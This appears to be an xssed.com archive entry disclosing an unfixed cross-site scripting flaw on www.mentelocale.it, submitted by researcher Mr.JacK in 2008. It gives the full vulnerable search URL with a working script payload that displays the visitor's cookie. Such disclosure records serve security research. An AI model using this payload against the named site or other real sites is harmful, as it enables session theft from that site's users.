Lucene search

K
xssedMr.JacKXSSED:55322
HistoryJun 12, 2008 - 12:00 a.m.

Unfixed XSS vulnerability at www.mentelocale.it

2008-06-1200:00:00
Mr.JacK
www.xssed.com
4
xss vulnerability
www.mentelocale.it
security researcher
alexa-ranked
unfixed vulnerability

Security researcher Mr.JacK, has submitted on 06/12/2008 a cross-site-scripting (XSS) vulnerability affecting www.mentelocale.it, which at the time of submission ranked 43319 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 24/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.mentelocale.it/genova/contenuti/generic_html/SezioneScelta_var_cerca?q=<script>alert(document.cookie)%3B<%2Fscript>&sa=OK&sitesearch=www.mentelocale.it&client=pub-4927776483077981&forid=1&ie=ISO-8859-1&oe=ISO-8859-1&cof=GALT%3A%23008000%3BGL%3A1%3BDIV%3A%23336699%3BVLC%3A663399%3BAH%3Acenter%3BBGC%3AFFFFFF%3BLBGC%3A336699%3BALC%3A0000FF%3BLC%3A0000FF%3BT%3A000000%3BGFNT%3A0000FF%3BGIMP%3A0000FF%3BFORID%3A11&hl=it&domains=www.mentelocale.it